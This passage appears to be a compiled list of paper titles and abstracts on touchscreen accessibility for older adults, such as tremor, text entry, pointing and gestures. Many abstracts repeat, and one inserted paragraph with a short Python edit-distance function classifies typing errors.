In this work, we empirically confirm this advantage by (1) measuring finger oscillation during different actions and (2) comparing error rate and user satisfaction between traditional tapping and swabbing in which the user slides his finger towards a target on a screen edge to select it. We found that oscillation is generally reduced during sliding. Also, compared to tapping, swabbing resulted in improved error rates and user satisfaction. We believe that swabbing will make touchscreens more accessible to senior users with tremor. --- paper_title: Age-related differences in performance with touchscreens compared to traditional mouse input paper_content: Despite the apparent popularity of touchscreens for older adults, little is known about the psychomotor performance of these devices. We compared performance between older adults and younger adults on four desktop and touchscreen tasks: pointing, dragging, crossing and steering. On the touchscreen, we also examined pinch-to-zoom. Our results show that while older adults were significantly slower than younger adults in general, the touchscreen reduced this performance gap relative to the desktop and mouse. Indeed, the touchscreen resulted in a significant movement time reduction of 35% over the mouse for older adults, compared to only 16% for younger adults. Error rates also decreased. --- paper_title: Usability evaluation of numeric entry tasks on keypad type and age. paper_content: Abstract This study investigated the effects of age and two keypad types (physical keypad and touch-screen one) on the usability of numeric entry tasks. Twenty four subjects (12 young adults 23–33 years old and 12 older adults 65–76 years old) performed three types of entry tasks: 4-digit, 4-digit of password type, and 11-digit. The dependent variables for the performance were mean entry time per unit stroke and error rate. Subjective ratings for ease of use of each keypad type were collected after the experiment. The mean entry time per unit stroke of the young adults was significantly smaller than that of the older adults. The older adults had significantly different mean entry times per unit stroke on the two keypad types. The error rates between young and older adults were significantly different for the touch-screen keypad. The subjective ratings showed that the participants preferred the touch-screen keypad to the physical keypad. The results showed that the older adults preferred the touch-screen keypad and could operate more quickly, and that tactile feedback is needed for the touch-screen keypad to increase input accuracy. The results of this study can be applied when designing different information technology products to input numbers using one hand. Relevance to industry Touch-screen technology is increasingly used in ticketing Kiosks used in public places such as airports, stations or theaters, and in automated teller machines (ATMs) and cash dispensers (CDs). This paper can be applied to design these products or systems, particularly considering usability improvements for older adults. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack of tactile feedback and motor stability, making it difficult effectively typing on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. 
Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. Our main goal is to inform future designs of touchscreen keyboards for elderly people. To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design. --- paper_title: Exploring the accessibility and appeal of surface computing for older adult health care support paper_content: This paper examines accessibility issues of surface computing with older adults and explores the appeal of surface computing for health care support. We present results from a study involving 20 older adults (age 60 to 88) performing gesture-based interactions on a multitouch surface. Older adults were able to successfully perform all actions on the surface computer, but some gestures that required two fingers (resize) and fine motor movement (rotate) were problematic. Ratings for ease of use and ease of performing each action as well as time required to figure out an action were similar to that of younger adults. Older adults reported that the surface computer was less intimidating, less frustrating, and less overwhelming than a traditional computer. The idea of using a surface computer for health care support was well-received by participants. We conclude with a discussion of design issues involving surface computing for older adults and use of this technology for health care. --- paper_title: Text entry on handheld computers by older users paper_content: Small pocket computers offer great potential in workplaces where mobility is needed to collect data or access reference information while carrying out tasks such as maintenance or customer support. This paper reports on three studies examining the hypothesis that data entry by older workers is easier when the pocket computer has a physical keyboard, albeit a small one, rather than a touchscreen keyboard. Using a counter-balanced, within-subjects design the accuracy and speed with which adults over 55 years of age could make or modify short text entries was measured for both kinds of pocket computer. The keyboard computer was the Hewlett Packard 360LX (HP), but the touch-screen computers varied across studies (experiment 1: Apple Newton™ and PalmPilot™; experiment 2: Philips Nino™; experiment 3: Casio E10™). All studies showed significant decrements in accuracy and speed when entering text via the touch-screen. Across studies, most participants preferred using the HP's small physical keyboard. Even after a... --- paper_title: A Study on the Icon Feedback Types of Small Touch Screen for the Elderly paper_content: Small touch screens are widely used in applications such as bank ATMs, point-of-sale terminals, ticket vending machines, facsimiles, and home automation in the daily life. It is intuition-oriented and easy to operate. 
There are a lot of elements that affect the small screen touch performance. One of the essential parts is icon feedback. However, to merely achieve beautiful icon feedback appearance and create interesting interaction experience, many interface designers ignore the real user needs. It is critical for them to trade off the icon feedback type associated with the different users needs in the touch interaction. This is especially important when the user capability is very limited. This paper described a pilot study for identifying factors that determine the icon feedback usability on small touch screen in four older adult Cognitrone groups since current research aimed mostly at general icon guidelines and recommendations and failed to consider and define the specific needs of small touch screen interfaces for the elderly. In this paper, we presented a concept from the focus on human necessity and use a cognitive assessment tool, which is, Cognitrone test, to measure older adult's attention and concentration capability and learn more about how to evaluate and design suitable small screen icon feedback types. Forty-five elder participants were participated. Each subject was asked to complete a battery of Cognitrone tests and divided into 4 groups. Each subject was also requested to perform a set of `continuous touch' usability tasks on small touch screen and comment on open-ended questions. Results are discussed with respect to the perceptual and cognitive factors that influence older adults in the use of icon feedback on small touch screen. It showed significant associations between icon feedback performance and factors of attention and concentration. However, this interrelation was much stronger for the Group 2 and Group 4, especially for Type B, Type C and Type G. Moreover, consistent with previous research, older participants were less sensitive and required longer time to adapt to the high-detailed icon feedback. These results are discussed in terms of icon feedback design strategies for interface designers. --- paper_title: Slipping and drifting: using older users to uncover pen-based target acquisition difficulties paper_content: This paper presents the results of a study to gather information on the underlying causes of pen -based target acquisition difficulty. In order to observe both simple and complex interaction, two tasks (menu and Fitts' tapping) were used. Thirty-six participants across three age groups (18-54, 54-69, and 70-85) were included to draw out both general shortcomings of targeting, and those difficulties unique to older users. Three primary sources of target acquisition difficulty were identified: slipping off the target, drifting unexpectedly from one menu to the next, and missing a menu selection by selecting the top edge of the item below. Based on these difficulties, we then evolved several designs for improving pen-based target acquisition. An additional finding was that including older users as participants allowed us to uncover pen-interaction deficiencies that we would likely have missed otherwise. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. 
The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Design pattern TRABING: touchscreen-based input technique for people affected by intention tremor paper_content: Tremor patients are frequently facing problems when interacting with IT systems and services. They do not reach the same levels of input efficiency and easily become unhappy with a technology they do not perceive as a general asset. Cases of Intention tremor show a significant comparative rise in inaccurate movement towards a real button or virtual buttons on touch screens, as this particular tremor increases its symptoms when approaching a desired physical target. People suffering from this specific tremor have been identified as the target group. This group has been closely investigated and thus, a new input procedure has been developed which may be used on standard touch screens. The new technique enables users, accordingly tremor patients, to fully operate IT-based systems and therefore possess full control over input. Deviations caused by the tremor are compensated with a continuous movement instead of a single targeted move which remains the most difficult task to the user. Also, the screen surface will present a frictional resistance, which significantly hinders tremor symptoms. Input can be identified by the computer system with high accuracy, by means of special heuristics, which support barrier free access beyond the target group. --- paper_title: Elderly User Evaluation of Mobile Touchscreen Interactions paper_content: Smartphones with touchscreen-based interfaces are increasingly used by non-technical groups including the elderly. However, application developers have little understanding of how senior users interact with their products and of how to design senior-friendly interfaces. As an initial study to assess standard mobile touchscreen interfaces for the elderly, we conducted performance measurements and observational evaluations of 20 elderly participants. The tasks included performing basic gestures such as taps, drags, and pinching motions and using basic interactive components such as software keyboards and photo viewers. We found that mobile touchscreens were generally easy for the elderly to use and a week's experience generally improved their proficiency. However, careful observations identified several typical problems that should be addressed in future interfaces. We discuss the implications of our experiments, seeking to provide informal guidelines for application developers to design better interfaces for elderly people. --- paper_title: Use of Computer Input Devices by Older Adults paper_content: A sample of 85 seniors was given experience (10 trials) playing two computer tasks using four input devices (touch screen, enlarged mouse [EZ Ball], mouse, and touch pad). Performance measures assessed both accuracy and time to complete components of the game for these devices. As well, participants completed a survey where they evaluated each of the devices. Seniors also completed a series of measures assessing visual memory, visual perception, motor coordination, and motor dexterity. 
Overall, previous experience with computers had a significant impact on the type of device that yielded the highest accuracy and speed performance, with different devices yielding better performance for novices versus experienced computer users. Regression analyses indicated that the mouse was the most demanding device in terms of the cognitive and motor-demand measures. Discussion centers on the relative benefits and perceptions regarding these devices among senior populations. --- paper_title: Investigating familiar interactions to help older adults learn computer applications more easily paper_content: Many older adults wish to gain competence in using a computer, but many application interfaces are perceived as complex and difficult to use, deterring potential users from investing the time to learn them. Hence, this study looks at the potential of 'familiar' interface design which builds upon users' knowledge of real world interactions, and applies existing skills to a new domain. Tools are provided in the form of familiar visual objects, and manipulated like real-world counterparts, rather than with buttons, icons and menus found in classic WIMP interfaces. This paper describes the formative evaluation of computer interactions that are based upon familiar real world tasks, which support multitouch interaction, involve few buttons and icons, no menus, no right-clicks or double-clicks and no dialogs. Using an example of an email client to test the principles of using "familiarity", the initial feedback was very encouraging, with 3 of the 4 participants being able to undertake some of the basic email tasks with no prior training and little or no help. The feedback has informed a number of refinements of the design principles, such as providing clearer affordance for visual objects. A full study is currently underway. --- paper_title: Gestural interfaces for elderly users: Help or hindrance paper_content: In this paper we investigate whether finger gesture input is a suitable input method, especially for older users (60+) with respect to age-related changes in sensory, cognitive and motor abilities. We present a study in which we compare a group of older users to a younger user group on a set of 42 different finger gestures on measures of speed and accuracy. The size and the complexity of the gestures varied systematically in order to find out how these factors interact with age on gesture performance. The results showed that older users are a little slower, but not necessarily less accurate than younger users, even on smaller screen sizes, and across different levels of gesture complexity. This indicates that gesture-based interaction could be a suitable input method for older adults. At least not a hindrance - maybe even a help. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack tactile feedback and motor stability, making it difficult to type effectively on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. Our main goal is to inform future designs of touchscreen keyboards for elderly people.
To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design. --- paper_title: Tap or touch?: pen-based selection accuracy for the young and old paper_content: The effect of the decline in cognitive, perceptive, and motor abilities on older adults' performance with input devices has been well documented in several experiments. None of these experiments, however, have provided information on the challenges faced by older adults when using pens to interact with handheld computers. To address this need, we conducted a study to learn about the performance of older adults in simple pen-based tasks with handheld computers. The study compared the performance of twenty 18-22 year olds, twenty 50-64 year olds, and twenty 65-84 year olds. We found that for the most part, older adults were able to complete tasks accurately. An exception occurred with the low accuracy rates achieved by 65-84 year old participants when tapping on targets of the same size as the standard radio buttons, checkboxes, and icons on the PocketPC. An alternative selection technique we refer to as "touch" enabled 65-84 year olds to select targets more accurately. This technique did not negatively affect the performance of the other participants. If tapping to select, making standard-sized targets 50 percent larger provided 65-84 year olds with similar advantages to switching to "touch" interactions. The results suggest that "touch" interactions need to be further explored to understand whether they will work in more realistic situations. --- paper_title: Text entry on handheld computers by older users paper_content: Small pocket computers offer great potential in workplaces where mobility is needed to collect data or access reference information while carrying out tasks such as maintenance or customer support. This paper reports on three studies examining the hypothesis that data entry by older workers is easier when the pocket computer has a physical keyboard, albeit a small one, rather than a touchscreen keyboard. Using a counter-balanced, within-subjects design the accuracy and speed with which adults over 55 years of age could make or modify short text entries was measured for both kinds of pocket computer. The keyboard computer was the Hewlett Packard 360LX (HP), but the touch-screen computers varied across studies (experiment 1: Apple Newton™ and PalmPilot™; experiment 2: Philips Nino™; experiment 3: Casio E10™). All studies showed significant decrements in accuracy and speed when entering text via the touch-screen. Across studies, most participants preferred using the HP's small physical keyboard. Even after a... 
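Relating to the insertion, substitution and omission analysis reported in the text-entry study above, such error categories are commonly obtained by aligning the presented and the transcribed strings with a Levenshtein-style dynamic program and counting the edit operations along an optimal alignment. The sketch below illustrates that general technique only; it is not the analysis pipeline used by the cited authors.

```python
def classify_text_entry_errors(presented, transcribed):
    """Count substitutions, insertions and omissions by aligning the presented
    text with what the user actually typed (minimum edit distance).

    'Omission' means a presented character the user never typed; 'insertion'
    is an extra typed character.
    """
    n, m = len(presented), len(transcribed)
    # dp[i][j] = minimum edit distance between presented[:i] and transcribed[:j]
    dp = [[0] * (m + 1) for _ in range(n + 1)]
    for i in range(n + 1):
        dp[i][0] = i
    for j in range(m + 1):
        dp[0][j] = j
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            cost = 0 if presented[i - 1] == transcribed[j - 1] else 1
            dp[i][j] = min(dp[i - 1][j] + 1,          # omit presented[i-1]
                           dp[i][j - 1] + 1,          # insert transcribed[j-1]
                           dp[i - 1][j - 1] + cost)   # match or substitute
    errors = {"substitutions": 0, "insertions": 0, "omissions": 0}
    i, j = n, m
    # Walk back through the table to recover which operations were used.
    while i > 0 or j > 0:
        if (i > 0 and j > 0 and dp[i][j] == dp[i - 1][j - 1]
                and presented[i - 1] == transcribed[j - 1]):
            i, j = i - 1, j - 1
        elif i > 0 and j > 0 and dp[i][j] == dp[i - 1][j - 1] + 1:
            errors["substitutions"] += 1
            i, j = i - 1, j - 1
        elif i > 0 and dp[i][j] == dp[i - 1][j] + 1:
            errors["omissions"] += 1
            i -= 1
        else:
            errors["insertions"] += 1
            j -= 1
    return errors

print(classify_text_entry_errors("touch screen", "touch scren"))  # one omitted 'e'
print(classify_text_entry_errors("touch", "toouch"))              # one inserted 'o'
```

Counts of this kind can then be normalised by the length of the presented text to obtain per-category error rates.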
--- paper_title: Slipping and drifting: using older users to uncover pen-based target acquisition difficulties paper_content: This paper presents the results of a study to gather information on the underlying causes of pen -based target acquisition difficulty. In order to observe both simple and complex interaction, two tasks (menu and Fitts' tapping) were used. Thirty-six participants across three age groups (18-54, 54-69, and 70-85) were included to draw out both general shortcomings of targeting, and those difficulties unique to older users. Three primary sources of target acquisition difficulty were identified: slipping off the target, drifting unexpectedly from one menu to the next, and missing a menu selection by selecting the top edge of the item below. Based on these difficulties, we then evolved several designs for improving pen-based target acquisition. An additional finding was that including older users as participants allowed us to uncover pen-interaction deficiencies that we would likely have missed otherwise. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Elderly User Evaluation of Mobile Touchscreen Interactions paper_content: Smartphones with touchscreen-based interfaces are increasingly used by non-technical groups including the elderly. However, application developers have little understanding of how senior users interact with their products and of how to design senior-friendly interfaces. As an initial study to assess standard mobile touchscreen interfaces for the elderly, we conducted performance measurements and observational evaluations of 20 elderly participants. The tasks included performing basic gestures such as taps, drags, and pinching motions and using basic interactive components such as software keyboards and photo viewers. We found that mobile touchscreens were generally easy for the elderly to use and a week's experience generally improved their proficiency. However, careful observations identified several typical problems that should be addressed in future interfaces. We discuss the implications of our experiments, seeking to provide informal guidelines for application developers to design better interfaces for elderly people. --- paper_title: A Study of Pointing Performance of Elderly Users on Smartphones paper_content: The number of global smartphone users is rapidly increasing. However, the proportion of elderly persons using smartphones is lower than that of other age groups because they feel it is difficult to use touch screens. There have only been a few studies about usability and elderly smartphone users or designs for them. Based on this background, we studied the pointing action of elderly users, which is a basic skill required to use touch screens on smartphones. 
We reviewed previous works to determine specific research methods and categorized them into three groups: (a) effect of target size and spacing on touch screen pointing performance, (b) effect of age on pointing performance, and (c) feedback of touch screens. To investigate the touch screen pointing performance of elderly, we conducted two experiments. In the first experiment, 3 target sizes (5 mm, 8 mm, and 12 mm) and 2 target spacings (1 mm, 3 mm) were evaluated. Adding to that, we analyzed whether touch screen pointing performance is dependent on th... --- paper_title: A Study on the Icon Feedback Types of Small Touch Screen for the Elderly paper_content: Small touch screens are widely used in applications such as bank ATMs, point-of-sale terminals, ticket vending machines, facsimiles, and home automation in the daily life. It is intuition-oriented and easy to operate. There are a lot of elements that affect the small screen touch performance. One of the essential parts is icon feedback. However, to merely achieve beautiful icon feedback appearance and create interesting interaction experience, many interface designers ignore the real user needs. It is critical for them to trade off the icon feedback type associated with the different users needs in the touch interaction. This is especially important when the user capability is very limited. This paper described a pilot study for identifying factors that determine the icon feedback usability on small touch screen in four older adult Cognitrone groups since current research aimed mostly at general icon guidelines and recommendations and failed to consider and define the specific needs of small touch screen interfaces for the elderly. In this paper, we presented a concept from the focus on human necessity and use a cognitive assessment tool, which is, Cognitrone test, to measure older adult's attention and concentration capability and learn more about how to evaluate and design suitable small screen icon feedback types. Forty-five elder participants were participated. Each subject was asked to complete a battery of Cognitrone tests and divided into 4 groups. Each subject was also requested to perform a set of `continuous touch' usability tasks on small touch screen and comment on open-ended questions. Results are discussed with respect to the perceptual and cognitive factors that influence older adults in the use of icon feedback on small touch screen. It showed significant associations between icon feedback performance and factors of attention and concentration. However, this interrelation was much stronger for the Group 2 and Group 4, especially for Type B, Type C and Type G. Moreover, consistent with previous research, older participants were less sensitive and required longer time to adapt to the high-detailed icon feedback. These results are discussed in terms of icon feedback design strategies for interface designers. --- paper_title: Slipping and drifting: using older users to uncover pen-based target acquisition difficulties paper_content: This paper presents the results of a study to gather information on the underlying causes of pen -based target acquisition difficulty. In order to observe both simple and complex interaction, two tasks (menu and Fitts' tapping) were used. Thirty-six participants across three age groups (18-54, 54-69, and 70-85) were included to draw out both general shortcomings of targeting, and those difficulties unique to older users. 
Three primary sources of target acquisition difficulty were identified: slipping off the target, drifting unexpectedly from one menu to the next, and missing a menu selection by selecting the top edge of the item below. Based on these difficulties, we then evolved several designs for improving pen-based target acquisition. An additional finding was that including older users as participants allowed us to uncover pen-interaction deficiencies that we would likely have missed otherwise. --- paper_title: Comparison between single-touch and multi-touch interaction for older people paper_content: This paper describes a study exploring the multi-touch interaction for older adults. The aim of this experiment was to check the relevance of this interaction versus single-touch interaction to realize object manipulation tasks: move, rotate and zoom. For each task, the user had to manipulate a rectangle and superimpose it to a picture frame. Our study shows that adults and principally older adults had more difficulties to realize these tasks for multi-touch interaction than for single-touch interaction. --- paper_title: Investigation of Input Devices for the Age-differentiated Design of Human-Computer Interaction: paper_content: Demographic change demands new concepts for the support of computer work by aging employees. In particular, computer interaction presents a barrier due to a lack of experience and age-specific changes in performance. This article presents a study in which different input devices (mouse, touch screen and eye-gaze input) were analyzed regarding their usability and according to age diversity. Furthermore, different Hybrid Interfaces that combine eye-gaze input with additional input devices were investigated. --- paper_title: Age-related differences in performance with touchscreens compared to traditional mouse input paper_content: Despite the apparent popularity of touchscreens for older adults, little is known about the psychomotor performance of these devices. We compared performance between older adults and younger adults on four desktop and touchscreen tasks: pointing, dragging, crossing and steering. On the touchscreen, we also examined pinch-to-zoom. Our results show that while older adults were significantly slower than younger adults in general, the touchscreen reduced this performance gap relative to the desktop and mouse. Indeed, the touchscreen resulted in a significant movement time reduction of 35% over the mouse for older adults, compared to only 16% for younger adults. Error rates also decreased. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack of tactile feedback and motor stability, making it difficult effectively typing on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. Our main goal is to inform future designs of touchscreen keyboards for elderly people. To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. 
Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design. --- paper_title: Tap or touch?: pen-based selection accuracy for the young and old paper_content: The effect of the decline in cognitive, perceptive, and motor abilities on older adults' performance with input devices has been well documented in several experiments. None of these experiments, however, have provided information on the challenges faced by older adults when using pens to interact with handheld computers. To address this need, we conducted a study to learn about the performance of older adults in simple pen-based tasks with handheld computers. The study compared the performance of twenty 18-22 year olds, twenty 50-64 year olds, and twenty 65-84 year olds. We found that for the most part, older adults were able to complete tasks accurately. An exception occurred with the low accuracy rates achieved by 65-84 year old participants when tapping on targets of the same size as the standard radio buttons, checkboxes, and icons on the PocketPC. An alternative selection technique we refer to as "touch" enabled 65-84 year olds to select targets more accurately. This technique did not negatively affect the performance of the other participants. If tapping to select, making standard-sized targets 50 percent larger provided 65-84 year olds with similar advantages to switching to "touch" interactions. The results suggest that "touch" interactions need to be further explored to understand whether they will work in more realistic situations. --- paper_title: Text entry on handheld computers by older users paper_content: Small pocket computers offer great potential in workplaces where mobility is needed to collect data or access reference information while carrying out tasks such as maintenance or customer support. This paper reports on three studies examining the hypothesis that data entry by older workers is easier when the pocket computer has a physical keyboard, albeit a small one, rather than a touchscreen keyboard. Using a counter-balanced, within-subjects design the accuracy and speed with which adults over 55 years of age could make or modify short text entries was measured for both kinds of pocket computer. The keyboard computer was the Hewlett Packard 360LX (HP), but the touch-screen computers varied across studies (experiment 1: Apple Newton™ and PalmPilot™; experiment 2: Philips Nino™; experiment 3: Casio E10™). All studies showed significant decrements in accuracy and speed when entering text via the touch-screen. Across studies, most participants preferred using the HP's small physical keyboard. Even after a... --- paper_title: Slipping and drifting: using older users to uncover pen-based target acquisition difficulties paper_content: This paper presents the results of a study to gather information on the underlying causes of pen -based target acquisition difficulty. In order to observe both simple and complex interaction, two tasks (menu and Fitts' tapping) were used. 
Thirty-six participants across three age groups (18-54, 54-69, and 70-85) were included to draw out both general shortcomings of targeting, and those difficulties unique to older users. Three primary sources of target acquisition difficulty were identified: slipping off the target, drifting unexpectedly from one menu to the next, and missing a menu selection by selecting the top edge of the item below. Based on these difficulties, we then evolved several designs for improving pen-based target acquisition. An additional finding was that including older users as participants allowed us to uncover pen-interaction deficiencies that we would likely have missed otherwise. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Elderly User Evaluation of Mobile Touchscreen Interactions paper_content: Smartphones with touchscreen-based interfaces are increasingly used by non-technical groups including the elderly. However, application developers have little understanding of how senior users interact with their products and of how to design senior-friendly interfaces. As an initial study to assess standard mobile touchscreen interfaces for the elderly, we conducted performance measurements and observational evaluations of 20 elderly participants. The tasks included performing basic gestures such as taps, drags, and pinching motions and using basic interactive components such as software keyboards and photo viewers. We found that mobile touchscreens were generally easy for the elderly to use and a week's experience generally improved their proficiency. However, careful observations identified several typical problems that should be addressed in future interfaces. We discuss the implications of our experiments, seeking to provide informal guidelines for application developers to design better interfaces for elderly people. --- paper_title: Use of Computer Input Devices by Older Adults paper_content: A sample of 85 seniors was given experience (10 trials) playing two computer tasks using four input devices (touch screen, enlarged mouse [EZ Ball], mouse, and touch pad). Performance measures assessed both accuracy and time to complete components of the game for these devices. As well, participants completed a survey where they evaluated each of the devices. Seniors also completed a series of measures assessing visual memory, visual perception, motor coordination, and motor dexterity. Overall, previous experience with computers had a significant impact on the type of device that yielded the highest accuracy and speed performance, with different devices yielding better performance for novices versus experienced computer users. 
Regression analyses indicated that the mouse was the most demanding device in terms of the cognitive and motor-demand measures. Discussion centers on the relative benefits and perceptions regarding these devices among senior populations. --- paper_title: Investigating familiar interactions to help older adults learn computer applications more easily paper_content: Many older adults wish to gain competence in using a computer, but many application interfaces are perceived as complex and difficult to use, deterring potential users from investing the time to learn them. Hence, this study looks at the potential of 'familiar' interface design which builds upon users' knowledge of real world interactions, and applies existing skills to a new domain. Tools are provided in the form of familiar visual objects, and manipulated like real-world counterparts, rather than with buttons, icons and menus found in classic WIMP interfaces. ::: ::: This paper describes the formative evaluation of computer interactions that are based upon familiar real world tasks, which support multitouch interaction, involves few buttons and icons, no menus, no right-clicks or double-clicks and no dialogs. Using an example of an email client to test the principles of using "familiarity", the initial feedback was very encouraging, with 3 of the 4 participants being able to undertake some of the basic email tasks with no prior training and little or no help. The feedback has informed a number of refinements of the design principles, such as providing clearer affordance for visual objects. A full study is currently underway. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack of tactile feedback and motor stability, making it difficult effectively typing on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. Our main goal is to inform future designs of touchscreen keyboards for elderly people. To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design. --- paper_title: Exploring the accessibility and appeal of surface computing for older adult health care support paper_content: This paper examines accessibility issues of surface computing with older adults and explores the appeal of surface computing for health care support. We present results from a study involving 20 older adults (age 60 to 88) performing gesture-based interactions on a multitouch surface. 
Older adults were able to successfully perform all actions on the surface computer, but some gestures that required two fingers (resize) and fine motor movement (rotate) were problematic. Ratings for ease of use and ease of performing each action as well as time required to figure out an action were similar to that of younger adults. Older adults reported that the surface computer was less intimidating, less frustrating, and less overwhelming than a traditional computer. The idea of using a surface computer for health care support was well-received by participants. We conclude with a discussion of design issues involving surface computing for older adults and use of this technology for health care. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Elderly User Evaluation of Mobile Touchscreen Interactions paper_content: Smartphones with touchscreen-based interfaces are increasingly used by non-technical groups including the elderly. However, application developers have little understanding of how senior users interact with their products and of how to design senior-friendly interfaces. As an initial study to assess standard mobile touchscreen interfaces for the elderly, we conducted performance measurements and observational evaluations of 20 elderly participants. The tasks included performing basic gestures such as taps, drags, and pinching motions and using basic interactive components such as software keyboards and photo viewers. We found that mobile touchscreens were generally easy for the elderly to use and a week's experience generally improved their proficiency. However, careful observations identified several typical problems that should be addressed in future interfaces. We discuss the implications of our experiments, seeking to provide informal guidelines for application developers to design better interfaces for elderly people. --- paper_title: Investigating familiar interactions to help older adults learn computer applications more easily paper_content: Many older adults wish to gain competence in using a computer, but many application interfaces are perceived as complex and difficult to use, deterring potential users from investing the time to learn them. Hence, this study looks at the potential of 'familiar' interface design which builds upon users' knowledge of real world interactions, and applies existing skills to a new domain. Tools are provided in the form of familiar visual objects, and manipulated like real-world counterparts, rather than with buttons, icons and menus found in classic WIMP interfaces. 
This paper describes the formative evaluation of computer interactions that are based upon familiar real world tasks, which support multitouch interaction, involve few buttons and icons, no menus, no right-clicks or double-clicks and no dialogs. Using an example of an email client to test the principles of using "familiarity", the initial feedback was very encouraging, with 3 of the 4 participants being able to undertake some of the basic email tasks with no prior training and little or no help. The feedback has informed a number of refinements of the design principles, such as providing clearer affordance for visual objects. A full study is currently underway. --- paper_title: Investigation of Input Devices for the Age-differentiated Design of Human-Computer Interaction: paper_content: Demographic change demands new concepts for the support of computer work by aging employees. In particular, computer interaction presents a barrier due to a lack of experience and age-specific changes in performance. This article presents a study in which different input devices (mouse, touch screen and eye-gaze input) were analyzed regarding their usability and according to age diversity. Furthermore, different Hybrid Interfaces that combine eye-gaze input with additional input devices were investigated. --- paper_title: A Study of Pointing Performance of Elderly Users on Smartphones paper_content: The number of global smartphone users is rapidly increasing. However, the proportion of elderly persons using smartphones is lower than that of other age groups because they feel it is difficult to use touch screens. There have only been a few studies about usability and elderly smartphone users or designs for them. Based on this background, we studied the pointing action of elderly users, which is a basic skill required to use touch screens on smartphones. We reviewed previous works to determine specific research methods and categorized them into three groups: (a) effect of target size and spacing on touch screen pointing performance, (b) effect of age on pointing performance, and (c) feedback of touch screens. To investigate the touch screen pointing performance of elderly, we conducted two experiments. In the first experiment, 3 target sizes (5 mm, 8 mm, and 12 mm) and 2 target spacings (1 mm, 3 mm) were evaluated. Adding to that, we analyzed whether touch screen pointing performance is dependent on th... --- 